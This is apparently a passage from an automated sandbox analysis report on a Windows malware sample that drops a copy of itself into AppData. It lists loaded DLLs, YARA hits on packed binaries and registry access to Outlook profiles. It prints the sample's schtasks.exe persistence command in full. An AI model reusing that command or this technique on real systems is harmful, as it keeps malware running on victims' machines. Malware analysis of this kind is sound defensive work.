Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: YvVDV4cbjy.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: YvVDV4cbjy.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.YvVDV4cbjy.exe.402e1f0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.HxQXdrrQ.exe.394e708.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.HxQXdrrQ.exe.39346e8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YvVDV4cbjy.exe.40141d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YvVDV4cbjy.exe.402e1f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.HxQXdrrQ.exe.39346e8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.HxQXdrrQ.exe.394e708.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.HxQXdrrQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.YvVDV4cbjy.exe.40141d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.HxQXdrrQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2067776523.000000000402E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2067776523.0000000004014000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: YvVDV4cbjy.exe PID: 736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HxQXdrrQ.exe PID: 1632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HxQXdrrQ.exe PID: 7096, type: MEMORYSTR

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Code function: 0_2_013C5E00 push eax; iretd	0_2_013C5E09
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 10_2_00D95E00 push eax; iretd	10_2_00D95E09
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 10_2_06F995E5 push eax; retf	10_2_06F995E6
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 10_2_06F992BD push ebx; retf	10_2_06F992C5
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 15_2_00402AC0 push eax; ret	15_2_00402AD4
Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe	Code function: 15_2_00402AC0 push eax; ret	15_2_00402AFC

Source: YvVDV4cbjy.exe	Static PE information: section name: .text entropy: 7.7039906967982645
Source: HxQXdrrQ.exe.0.dr	Static PE information: section name: .text entropy: 7.7039906967982645

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe

File created: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YvVDV4cbjy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
